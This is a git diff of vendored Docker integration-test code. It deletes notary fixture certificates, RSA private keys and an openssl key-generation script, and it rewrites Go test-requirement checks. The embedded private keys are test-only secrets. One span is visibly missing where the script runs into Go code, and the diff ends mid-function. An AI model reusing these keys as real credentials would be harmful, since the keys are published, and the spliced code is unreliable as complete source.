-8oKHlBBl6pRxHIKzNN4VFbeBvvYvrogrDrC/owIDAQABAoIBAB/o8KZwsgfUhqh7 -WoViSCwQb0e0z7hoFwhpUl4uXPTGf1v6HEgDDPG0PwwgkdbwNaypQZVtWevj4NTQ -R326jjdjH1xbfQa2PZpz722L3jDqJR6plEtFxRoIv3KrCffPsrgabIu2mnnJJpDB -ixtW5cq0sT4ov2i4H0i85CWWwbSY/G/MHsvCuK9PhoCj9uToVqrf1KrAESE5q4fh -mPSYUL99KVnj7SZkUz+79rc8sLLPVks3szZACMlm1n05ZTj/d6Nd2ZZUO45DllIj -1XJghfWmnChrB/P/KYXgQ3Y9BofIAw1ra2y3wOZeqRFNsbmojcGldfdtN/iQzhEj -uk4ThokCgYEA9FTmv36N8qSPWuqX/KzkixDQ8WrDGohcB54kK98Wx4ijXx3i38SY -tFjO8YUS9GVo1+UgmRjZbzVX7xeum6+TdBBwOjNOxEQ4tzwiQBWDdGpli8BccdJ2 -OOIVxSslWhiUWfpYloXVetrR88iHbT882g795pbonDaJdXSLnij4UW8CgYEAxxrr -QFpsmOEZvI/yPSOGdG7A1RIsCeH+cEOf4cKghs7+aCtAHlIweztNOrqirl3oKI1r -I0zQl46WsaW8S/y99v9lmmnZbWwqLa4vIu0NWs0zaZdzKZw3xljMhgp4Ge69hHa2 -utCtAxcX+7q/yLlHoTiYwKdxX54iLkheCB8csw0CgYEAleEG820kkjXUIodJ2JwO -Tihwo8dEC6CeI6YktizRgnEVFqH0rCOjMO5Rc+KX8AfNOrK5PnD54LguSuKSH7qi -j04OKgWTSd43lF90+y63RtCFnibQDpp2HwrBJAQFk7EEP/XMJfnPLN/SbuMSADgM -kg8kPTFRW5Iw3DYz9z9WpE0CgYAkn6/8Q2XMbUOFqti9JEa8Lg8sYk5VdwuNbPMA -3QMYKQUk9ieyLB4c3Nik3+XCuyVUKEc31A5egmz3umu7cn8i6vGuiJ/k/8t2YZ7s -Bry5Ihu95Yzab5DW3Eiqs0xKQN79ebS9AluAwQO5Wy2h52rknfuDHIm/M+BHsSoS -xl5KFQKBgQCokCsYuX1z2GojHw369/R2aX3ovCGuHqy4k7fWxUrpHTHvth2+qNPr -84qLJ9rLWoZE5sUiZ5YdwCgW877EdfkT+v4aaBX79ixso5VdqgJ/PdnoNntah/Vq -njQiW1skn6/P5V/eyimN2n0VsyBr/zMDEtYTRP/Tb1zi/njFLQkZEA== ------END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt deleted file mode 100644 index bec084790a..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt +++ /dev/null @@ -1,21 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIDhTCCAm2gAwIBAgIJAIq8naKlYAQfMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV -BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD -VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ4 -WhcNMjYwNjI4MTc0ODQ4WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT -BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk -ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyY2EWYTW -5VHipw08t675upmD6a+akiuZ1z+XpuOxZCgjZ0aHfoOe8wGKg3Ohz7UCBdD5Mob/ -L/qvRlsCaqPHGZKIyyX1HDO4mpuQQFBhYxt+ZAO3AaawEUOw2rwwMDEjLnDDTSZM -z8jxCMvsJjBDqgb8g3z+AmjducQ/OH6llldgHIBY8ioRbROCL2PGgqywWq2fThav -c70YMxtKviBGDNCouYeQ8JMK/PuLwPNDXNQAagFHVARXiUv/ILHk7ImYnSGJUcuk -JTUGN2MBnpY0eakg7i+4za8sjjqOdn+2I6aVzlGJDSiRP72nkg/cE4BqMl9FrMwK -9iS8xa9yMDLUvwIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF -oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUvQzzFmh3Sv3HcdExY3wx -/1u6JLAwDQYJKoZIhvcNAQELBQADggEBAJcmDme2Xj/HPUPwaN/EyCmjhY73EiHO -x6Pm16tscg5JGn5A+u3CZ1DmxUYl8Hp6MaW/sWzdtL0oKJg76pynadCWh5EacFR8 -u+2GV/IcN9mSX6JQzvrqbjSqo5/FehqBD+W5h3euwwApWA3STAadYeyEfmdOA3SQ -W1vzrA1y7i8qgTqeJ7UX1sEAXlIhBK2zPYaMB+en+ZOiPyNxJYj6IDdGdD2paC9L -6H9wKC+GAUTSdCWp89HP7ETSXEGr94AXkrwU+qNsiN+OyK8ke0EMngEPh5IQoplw -/7zEZCth3oKxvR1/4S5LmTVaHI2ZlbU4q9bnY72G4tw8YQr2gcBGo4w= ------END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key deleted file mode 100644 index 5ccabe908f..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key +++ /dev/null @@ -1,27 +0,0 @@ ------BEGIN RSA PRIVATE KEY----- -MIIEogIBAAKCAQEAyY2EWYTW5VHipw08t675upmD6a+akiuZ1z+XpuOxZCgjZ0aH -foOe8wGKg3Ohz7UCBdD5Mob/L/qvRlsCaqPHGZKIyyX1HDO4mpuQQFBhYxt+ZAO3 -AaawEUOw2rwwMDEjLnDDTSZMz8jxCMvsJjBDqgb8g3z+AmjducQ/OH6llldgHIBY -8ioRbROCL2PGgqywWq2fThavc70YMxtKviBGDNCouYeQ8JMK/PuLwPNDXNQAagFH -VARXiUv/ILHk7ImYnSGJUcukJTUGN2MBnpY0eakg7i+4za8sjjqOdn+2I6aVzlGJ -DSiRP72nkg/cE4BqMl9FrMwK9iS8xa9yMDLUvwIDAQABAoIBAHmffvzx7ydESWwa -zcfdu26BkptiTvjjfJrqEd4wSewxWGPKqJqMXE8xX99A2KTZClZuKuH1mmnecQQY -iRXGrK9ewFMuHYGeKEiLlPlqR8ohXhyGLVm+t0JDwaXMp5t9G0i73O5iLTm5fNGd -FGxa9YnVW20Q8MqNczbVGH1D1zInhxzzOyFzBd4bBBJ8PdrUdyLpd7+RxY2ghnbT -p9ZANR2vk5zmDLJgZx72n/u+miJWuhY6p0v3Vq4z/HHgdhf+K6vpDdzTcYlA0rO4 -c/c+RKED3ZadGUD5QoLsmEN0e3FVSMPN1kt4ZRTqWfH8f2X4mLz33aBryTjktP6+ -1rX6ThECgYEA74wc1Tq23B5R0/GaMm1AK3Ko2zzTD8wK7NSCElh2dls02B+GzrEB -aE3A2GMQSuzb+EA0zkipwANBaqs3ZemH5G1pu4hstQsXCMd4jAJn0TmTXlplXBCf -PSc8ZUU6XcJENRr9Q7O9/TGlgahX+z0ndxYx/CMCsSu7XsMg4IZsbAcCgYEA12Vb -wKOVG15GGp7pMshr+2rQfVimARUP4gf3JnQmenktI4PfdnMW3a4L3DEHfLhIerwT -6lRp/NpxSADmuT4h1UO1l2lc+gmTVPw0Vbl6VwHpgS5Kfu4ZyM6n3S66f/dE4nu7 -hQF9yZz7vn5Agghak4p6a1wC1gdMzR1tvxFzk4kCgYByBMTskWfcWeok8Yitm+bB -R3Ar+kWT7VD97SCETusD5uG+RTNLSmEbHnc+B9kHcLo67YS0800pAeOvPBPARGnU -RmffRU5I1iB+o0MzkSmNItSMQoagTaEd4IEUyuC/I+qHRHNsOC+kRm86ycAm67LP -MhdUpe1wGxqyPjp15EXTHQKBgDKzFu+3EWfJvvKRKQ7dAh3BvKVkcl6a2Iw5l8Ej -YdM+JpPPfI/i8yTmzL/dgoem0Nii4IUtrWzo9fUe0TAVId2S/HFRSaNJEbbVTnRH -HjbQqmfPv5U08jjD+9siHp/0UfCFc1QRT8xe+RqTmReCY9+KntoaZEiAm2FEZgqt -TukRAoGAf7QqbTP5/UH1KSkX89F5qy/6GS3pw6TLj9Ufm/l/NO8Um8gag6YhEKWR -7HpkpCqjfWj8Av8ESR9cqddPGrbdqXFm9z7dCjlAd5T3Q3h/h+v+JzLQWbsI6WOb -SsOSWNyE006ZZdIiFwO6GfxpLI24sVtYKgyob6Q71oxSqfnrnT0= ------END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt deleted file mode 100644 index f434b45fc8..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt +++ /dev/null @@ -1,21 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIDhTCCAm2gAwIBAgIJAKHt/jxiWqMtMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV -BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD -VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ5 -WhcNMjYwNjI4MTc0ODQ5WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT -BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk -ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqfbJk2Dk -C9FJVjV2+Q2CQrJphG3vFc1Qlu9jgVA5RhGmF9jJzetsclsV/95nBhinIGcSmPQA -l318G7Bz/cG/6O2n5+hj+S1+YOvQweReZj3d4kCeS86SOyLNTpMD9gsF0S8nR1RN -h0jD4t1vxAVeGD1o61U8/k0O5eDoeOfOSWZagKk5PhyrMZgNip4IrG46umCkFlrw -zMMcgQdwTQXywPqkr/LmYpqT1WpMlzHYTQEY8rKorIJQbPtHVYdr4UxYnNmk6fbU -biEP1DQlwjBWcFTsDLqXKP/K+e3O0/e/hMB0y7Tj9fZ7Viw0t5IKXZPsxMhwknUT -9vmPzIJO6NiniwIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF -oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUdTXRP1EzxQ+UDZSoheVo -Mobud1cwDQYJKoZIhvcNAQELBQADggEBADV9asTWWdbmpkeRuKyi0xGho39ONK88 -xxkFlco766BVgemo/rGQj3oPuw6M6SzHFoJ6JUPjmLiAQDIGEU/2/b6LcOuLjP+4 -YejCcDTY3lSW/HMNoAmzr2foo/LngNGfe/qhVFUqV7GjFT9+XzFFBfIZ1cQiL2ed -kc8rgQxFPwWXFCSwaENWeFnMDugkd+7xanoAHq8GsJpg5fTruDTmJkUqC2RNiMLn -WM7QaqW7+lmUnMnc1IBoz0hFhgoiadWM/1RQxx51zTVw6Au1koIm4ZXu5a+/WyC8 -K1+HyUbc0AVaDaRBpRSOR9aHRwLGh6WQ4aUZQNyJroc999qfYrDEEV8= ------END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key deleted file mode 100644 index a61d18cc3d..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key +++ /dev/null @@ -1,27 +0,0 @@ ------BEGIN RSA PRIVATE KEY----- -MIIEpQIBAAKCAQEAqfbJk2DkC9FJVjV2+Q2CQrJphG3vFc1Qlu9jgVA5RhGmF9jJ -zetsclsV/95nBhinIGcSmPQAl318G7Bz/cG/6O2n5+hj+S1+YOvQweReZj3d4kCe -S86SOyLNTpMD9gsF0S8nR1RNh0jD4t1vxAVeGD1o61U8/k0O5eDoeOfOSWZagKk5 -PhyrMZgNip4IrG46umCkFlrwzMMcgQdwTQXywPqkr/LmYpqT1WpMlzHYTQEY8rKo -rIJQbPtHVYdr4UxYnNmk6fbUbiEP1DQlwjBWcFTsDLqXKP/K+e3O0/e/hMB0y7Tj -9fZ7Viw0t5IKXZPsxMhwknUT9vmPzIJO6NiniwIDAQABAoIBAQCAr/ed3A2umO7T -FDYZik3nXBiiiW4t7r+nGGgZ3/kNgY1lnuHlROxehXLZwbX1mrLnyML/BjhwezV9 -7ZNVPd6laVPpNj6DyxtWHRZ5yARlm1Al39E7CpQTrF0QsiWcpGnqIa62xjDRTpnq -askV/Q5qggyvqmE9FnFCQpEiAjlhvp7F0kVHVJm9s3MK3zSyR0UTZ3cpYus2Jr2z -OotHgAMHq5Hgb3dvxOeE2xRMeYAVDujbkNzXm2SddAtiRdLhWDh7JIr3zXhp0HyN -4rLOyhlgz00oIGeDt/C0q3fRmghr3iZOG+7m2sUx0FD1Ru1dI9v2A+jYmIVNW6+x -YJk5PzxJAoGBANDj7AGdcHSci/LDBPoTTUiz3uucAd27/IJma/iy8mdbVfOAb0Fy -PRSPvoozlpZyOxg2J4eH/o4QxQR4lVKtnLKZLNHK2tg3LarwyBX1LiI3vVlB+DT1 -AmV8i5bJAckDhqFeEH5qdWZFi03oZsSXWEqX5iMYCrdK5lTZggcrFZeHAoGBANBL -fkk3knAdcVfTYpmHx18GBi2AsCWTd20KD49YBdbVy0Y2Jaa1EJAmGWpTUKdYx40R -H5CuGgcAviXQz3bugdTU1I3tAclBtpJNU7JkhuE+Epz0CM/6WERJrE0YxcGQA5ui -6fOguFyiXD1/85jrDBOKy74aoS7lYz9r/a6eqmjdAoGBAJpm/nmrIAZx+Ff2ouUe -A1Ar9Ch/Zjm5zEmu3zwzOU4AiyWz14iuoktifNq2iyalRNz+mnVpplToPFizsNwu -C9dPtXtU0DJlhtIFrD/evLz6KnGhe4/ZUm4lgyBvb2xfuNHqL5Lhqelwmil6EQxb -Oh3Y7XkfOjyFln89TwlxZUJdAoGAJRMa4kta7EvBTeGZLjyltvsqhFTghX+vBSCC -ToBbYbbiHJgssXSPAylU4sD7nR3HPwuqM6VZip+OOMrm8oNXZpuPTce+xqTEq1vK -JvmPrG3RAFDLdMFZjqYSXhKnuGE60yv3Ol8EEbDwfB3XLQPBPYU56Jdy0xcPSE2f -dMJXEJ0CgYEAisZw0nXw6lFeYecu642EGuU0wv1O9i21p7eho9QwOcsoTl4Q9l+M -M8iBv+qTHO+D19l4JbkGvy2H2diKoYduUFACcuiFYs8fjrT+4Z6DyOQAQGAf6Ylw -BFbU15k6KbA9v4mZDfd1tY9x62L/XO55ZxYG+J+q0e26tEThgD8cEog= ------END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt deleted file mode 100644 index c8cbe46bdf..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt +++ /dev/null @@ -1,21 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIDhTCCAm2gAwIBAgIJANae++ZkUEWMMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV -BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD -VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ5 -WhcNMjYwNjI4MTc0ODQ5WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT -BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk -ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqULAjgba -Y2I10WfqdmYnPfEqEe6iMDbzcgECb2xKafXcI4ltkQj1iO4zBTs0Ft9EzXFc5ZBh -pTjZrL6vrIa0y/CH2BiIHBJ0wRHx/40HXp4DSj3HZpVOlEMI3npRfBGNIBllUaRN -PWG7zL7DcKMIepBfPXyjBsxzH3yNiISq0W5hSiy+ImhSo3aipJUHHcp9Z9NgvpNC -3QvnxsGKRnECmDRDlxkq+FQu9Iqs/HWFYWgyfcsw+YTrWZq3qVnnqUouHO//c9PG -Ry3sZSDU97MwvkjvWys1e01Xvd3AbHx08YAsxih58i/OBKe81eD9NuZDP2KrjTxI -5xkXKhj6DV2NnQIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF -oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUDt95hiqbQvi0KcvZGAUu -VisnztQwDQYJKoZIhvcNAQELBQADggEBAGi7qHai7MWbfeu6SlXhzIP3AIMa8TMi -lp/+mvPUFPswIVqYJ71MAN8uA7CTH3z50a2vYupGeOEtZqVJeRf+xgOEpwycncxp -Qz6wc6TWPVIoT5q1Hqxw1RD2MyKL+Y+QBDYwFxFkthpDMlX48I9frcqoJUWFxBF2 -lnRr/cE7BbPE3sMbXV3wGPlH7+eUf+CgzXJo2HB6THzagyEgNrDiz/0rCQa1ipFd -mNU3D/U6BFGmJNxhvSOtXX9escg8yjr05YwwzokHS2K4jE0ZuJPBd50C/Rvo3Mf4 -0h7/2Q95e7d42zPe9WYPu2F8KTWsf4r+6ddhKrKhYzXIcTAfHIOiO+U= ------END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key deleted file mode 100644 index f473cc495a..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key +++ /dev/null @@ -1,27 +0,0 @@ ------BEGIN RSA PRIVATE KEY----- -MIIEpAIBAAKCAQEAqULAjgbaY2I10WfqdmYnPfEqEe6iMDbzcgECb2xKafXcI4lt -kQj1iO4zBTs0Ft9EzXFc5ZBhpTjZrL6vrIa0y/CH2BiIHBJ0wRHx/40HXp4DSj3H -ZpVOlEMI3npRfBGNIBllUaRNPWG7zL7DcKMIepBfPXyjBsxzH3yNiISq0W5hSiy+ -ImhSo3aipJUHHcp9Z9NgvpNC3QvnxsGKRnECmDRDlxkq+FQu9Iqs/HWFYWgyfcsw -+YTrWZq3qVnnqUouHO//c9PGRy3sZSDU97MwvkjvWys1e01Xvd3AbHx08YAsxih5 -8i/OBKe81eD9NuZDP2KrjTxI5xkXKhj6DV2NnQIDAQABAoIBAGK0ZKnuYSiXux60 -5MvK4pOCsa/nY3mOcgVHhW4IzpRgJdIrcFOlz9ncXrBsSAIWjX7o3u2Ydvjs4DOW -t8d6frB3QiDInYcRVDjLCD6otWV97Bk9Ua0G4N4hAWkMF7ysV4oihS1JDSoAdo39 -qOdki6s9yeyHZGKwk2oHLlowU5TxQMBA8DHmxqBII1HTm+8xRz45bcEqRXydYSUn -P1JuSU9jFqdylxU+Nrq6ehslMQ3y7qNWQyiLGxu6EmR+vgrzSU0s3iAOqCHthaOS -VBBXPL3DNEYUS+0QGnGrACuJhanOMBfdiO6Orelx6ZzWZm38PNGv0yBt0WCM+8/A -TtQNGkECgYEA1LqR6AH9XikUQ0+rM4526BgVuYqtjw21h4Lj9alaA+YTQntBBJOv -iAcUpnJiV4T8jzAMLeqpK8R/rbxRnK5S9jOV2gr+puk4L6tH46cgahBUESDigDp8 -6vK8ur6ubBcXNPh3AT6rsPj+Ph2EU3raqiYdouvCdga/OCYZb+jr6UkCgYEAy7Cr -l8WssI/8/ORcQ4MFJFNyfz/Y2beNXyLd1PX0H+wRSiGcKzeUuTHNtzFFpMbrK/nx -ZOPCT2ROdHsBHzp1L+WquCb0fyMVSiYiXBU+VCFDbUU5tBr3ycTc7VwuFPENOiha -IdlWgew/aW110FQHIaqe9g+htRe+mXe++faZtbUCgYB/MSJmNzJX53XvHSZ/CBJ+ -iVAMBSfq3caJRLCqRNzGcf1YBbwFUYxlZ95n+wJj0+byckcF+UW3HqE8rtmZNf3y -qTtTCLnj8JQgpGeybU4LPMIXD7N9+fqQvBwuCC7gABpnGJyHCQK9KNNTLnDdPRqb -G3ki3ZYC3dvdZaJV8E2FyQKBgQCMa5Mf4kqWvezueo+QizZ0QILibqWUEhIH0AWV -1qkhiKCytlDvCjYhJdBnxjP40Jk3i+t6XfmKud/MNTAk0ywOhQoYQeKz8v+uSnPN -f2ekn/nXzq1lGGJSWsDjcXTjQvqXaVIZm7cjgjaE+80IfaUc9H75qvUT3vaq3f5u -XC7DMQKBgQDMAzCCpWlEPbZoFMl6F49+7jG0/TiqM/WRUSQnNtufPMbrR9Je4QM1 -L1UCANCPaHFOncKYer15NfIV1ctt5MZKImevDsUaQO8CUlO+dzd5H8KvHw9E29gA -B22v8k3jIjsYeRL+UJ/sBnWHgxdAe/NEM+TdlP2oP9D1gTifutPqAg== ------END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh deleted file mode 100755 index 8d6381cec4..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh +++ /dev/null @@ -1,18 +0,0 @@ -for selfsigned in delgkey1 delgkey2 delgkey3 delgkey4; do - subj='/C=US/ST=CA/L=SanFrancisco/O=Docker/CN=delegation' - - openssl genrsa -out "${selfsigned}.key" 2048 - openssl req -new -key "${selfsigned}.key" -out "${selfsigned}.csr" -sha256 -subj "${subj}" - cat > "${selfsigned}.cnf" < 1 && buf[0] == 'Y' - }, - "Test requires apparmor is enabled.", - } - RegistryHosting = testRequirement{ - func() bool { - // for now registry binary is built only if we're running inside - // container through `make test`. Figure that out by testing if - // registry binary is in PATH. - _, err := exec.LookPath(v2binary) - return err == nil - }, - fmt.Sprintf("Test requires an environment that can host %s in the same host", v2binary), - } - NotaryHosting = testRequirement{ - func() bool { - // for now notary binary is built only if we're running inside - // container through `make test`. Figure that out by testing if - // notary-server binary is in PATH. - _, err := exec.LookPath(notaryServerBinary) - return err == nil - }, - fmt.Sprintf("Test requires an environment that can host %s in the same host", notaryServerBinary), - } - NotaryServerHosting = testRequirement{ - func() bool { - // for now notary-server binary is built only if we're running inside - // container through `make test`. Figure that out by testing if - // notary-server binary is in PATH. - _, err := exec.LookPath(notaryServerBinary) - return err == nil - }, - fmt.Sprintf("Test requires an environment that can host %s in the same host", notaryServerBinary), - } - NotOverlay = testRequirement{ - func() bool { - return !strings.HasPrefix(daemonStorageDriver, "overlay") - }, - "Test requires underlying root filesystem not be backed by overlay.", - } - - Devicemapper = testRequirement{ - func() bool { - return strings.HasPrefix(daemonStorageDriver, "devicemapper") - }, - "Test requires underlying root filesystem to be backed by devicemapper.", - } - - IPv6 = testRequirement{ - func() bool { - cmd := exec.Command("test", "-f", "/proc/net/if_inet6") - - if err := cmd.Run(); err != nil { - return true - } - return false - }, - "Test requires support for IPv6", - } - UserNamespaceROMount = testRequirement{ - func() bool { - // quick case--userns not enabled in this test run - if os.Getenv("DOCKER_REMAP_ROOT") == "" { - return true - } - if _, _, err := dockerCmdWithError("run", "--rm", "--read-only", "busybox", "date"); err != nil { - return false - } - return true - }, - "Test cannot be run if user namespaces enabled but readonly mounts fail on this kernel.", - } - UserNamespaceInKernel = testRequirement{ - func() bool { - if _, err := os.Stat("/proc/self/uid_map"); os.IsNotExist(err) { - /* - * This kernel-provided file only exists if user namespaces are - * supported - */ - return false - } - - // We need extra check on redhat based distributions - if f, err := os.Open("/sys/module/user_namespace/parameters/enable"); err == nil { - defer f.Close() - b := make([]byte, 1) - _, _ = f.Read(b) - if string(b) == "N" { - return false - } - return true - } - - return true - }, - "Kernel must have user namespaces configured and enabled.", - } - NotUserNamespace = testRequirement{ - func() bool { - root := os.Getenv("DOCKER_REMAP_ROOT") - if root != "" { - return false - } - return true - }, - "Test cannot be run when remapping root", - } - IsPausable = testRequirement{ - func() bool { - if daemonPlatform == "windows" { - return isolation == "hyperv" - } - return true - }, - "Test requires containers are pausable.", - } - NotPausable = testRequirement{ - func() bool { - if daemonPlatform == "windows" { - return isolation == "process" - } - return false - }, - "Test requires containers are not pausable.", - } - IsolationIsHyperv = testRequirement{ - func() bool { - return daemonPlatform == "windows" && isolation == "hyperv" - }, - "Test requires a Windows daemon running default isolation mode of hyperv.", - } - IsolationIsProcess = testRequirement{ - func() bool { - return daemonPlatform == "windows" && isolation == "process" - }, - "Test requires a Windows daemon running default isolation mode of process.", - } -) - -// testRequires checks if the environment satisfies the requirements -// for the test to run or skips the tests. -func testRequires(c *check.C, requirements ...testRequirement) { - for _, r := range requirements { - if !r.Condition() { - c.Skip(r.SkipMessage) - } - } -} diff --git a/vendor/github.com/docker/docker/integration-cli/requirements_test.go b/vendor/github.com/docker/docker/integration-cli/requirements_test.go new file mode 100644 index 0000000000..28be59cd2c --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/requirements_test.go @@ -0,0 +1,219 @@ +package main + +import ( + "context" + "fmt" + "io/ioutil" + "net/http" + "os" + "os/exec" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/requirement" + "github.com/docker/docker/internal/test/registry" +) + +func ArchitectureIsNot(arch string) bool { + return os.Getenv("DOCKER_ENGINE_GOARCH") != arch +} + +func DaemonIsWindows() bool { + return testEnv.OSType == "windows" +} + +func DaemonIsWindowsAtLeastBuild(buildNumber int) func() bool { + return func() bool { + if testEnv.OSType != "windows" { + return false + } + version := testEnv.DaemonInfo.KernelVersion + numVersion, _ := strconv.Atoi(strings.Split(version, " ")[1]) + return numVersion >= buildNumber + } +} + +func DaemonIsLinux() bool { + return testEnv.OSType == "linux" +} + +func MinimumAPIVersion(version string) func() bool { + return func() bool { + return versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), version) + } +} + +func OnlyDefaultNetworks() bool { + cli, err := client.NewEnvClient() + if err != nil { + return false + } + networks, err := cli.NetworkList(context.TODO(), types.NetworkListOptions{}) + if err != nil || len(networks) > 0 { + return false + } + return true +} + +// Deprecated: use skip.If(t, !testEnv.DaemonInfo.ExperimentalBuild) +func ExperimentalDaemon() bool { + return testEnv.DaemonInfo.ExperimentalBuild +} + +func IsAmd64() bool { + return os.Getenv("DOCKER_ENGINE_GOARCH") == "amd64" +} + +func NotArm() bool { + return ArchitectureIsNot("arm") +} + +func NotArm64() bool { + return ArchitectureIsNot("arm64") +} + +func NotPpc64le() bool { + return ArchitectureIsNot("ppc64le") +} + +func NotS390X() bool { + return ArchitectureIsNot("s390x") +} + +func SameHostDaemon() bool { + return testEnv.IsLocalDaemon() +} + +func UnixCli() bool { + return isUnixCli +} + +func ExecSupport() bool { + return supportsExec +} + +func Network() bool { + // Set a timeout on the GET at 15s + var timeout = time.Duration(15 * time.Second) + var url = "https://hub.docker.com" + + client := http.Client{ + Timeout: timeout, + } + + resp, err := client.Get(url) + if err != nil && strings.Contains(err.Error(), "use of closed network connection") { + panic(fmt.Sprintf("Timeout for GET request on %s", url)) + } + if resp != nil { + resp.Body.Close() + } + return err == nil +} + +func Apparmor() bool { + if strings.HasPrefix(testEnv.DaemonInfo.OperatingSystem, "SUSE Linux Enterprise Server ") { + return false + } + buf, err := ioutil.ReadFile("/sys/module/apparmor/parameters/enabled") + return err == nil && len(buf) > 1 && buf[0] == 'Y' +} + +func Devicemapper() bool { + return strings.HasPrefix(testEnv.DaemonInfo.Driver, "devicemapper") +} + +func IPv6() bool { + cmd := exec.Command("test", "-f", "/proc/net/if_inet6") + return cmd.Run() != nil +} + +func UserNamespaceROMount() bool { + // quick case--userns not enabled in this test run + if os.Getenv("DOCKER_REMAP_ROOT") == "" { + return true + } + if _, _, err := dockerCmdWithError("run", "--rm", "--read-only", "busybox", "date"); err != nil { + return false + } + return true +} + +func NotUserNamespace() bool { + root := os.Getenv("DOCKER_REMAP_ROOT") + return root == "" +} + +func UserNamespaceInKernel() bool { + if _, err := os.Stat("/proc/self/uid_map"); os.IsNotExist(err) { + /* + * This kernel-provided file only exists if user namespaces are + * supported + */ + return false + } + + // We need extra check on redhat based distributions + if f, err := os.Open("/sys/module/user_namespace/parameters/enable"); err == nil { + defer f.Close() + b := make([]byte, 1) + _, _ = f.Read(b) + return string(b) != "N" + } + + return true +} + +func IsPausable() bool { + if testEnv.OSType == "windows" { + return testEnv.DaemonInfo.Isolation == "hyperv" + } + return true +} + +func NotPausable() bool { + if testEnv.OSType == "windows" { + return testEnv.DaemonInfo.Isolation == "process" + } + return false +} + +func IsolationIs(expectedIsolation string) bool { + return testEnv.OSType == "windows" && string(testEnv.DaemonInfo.Isolation) == expectedIsolation +} + +func IsolationIsHyperv() bool { + return IsolationIs("hyperv") +} + +func IsolationIsProcess() bool { + return IsolationIs("process") +} + +// RegistryHosting returns wether the host can host a registry (v2) or not +func RegistryHosting() bool { + // for now registry binary is built only if we're running inside + // container through `make test`. Figure that out by testing if + // registry binary is in PATH. + _, err := exec.LookPath(registry.V2binary) + return err == nil +} + +func SwarmInactive() bool { + return testEnv.DaemonInfo.Swarm.LocalNodeState == swarm.LocalNodeStateInactive +} + +func TODOBuildkit() bool { + return os.Getenv("DOCKER_BUILDKIT") == "" +} + +// testRequires checks if the environment satisfies the requirements +// for the test to run or skips the tests. +func testRequires(c requirement.SkipT, requirements ...requirement.Test) { + 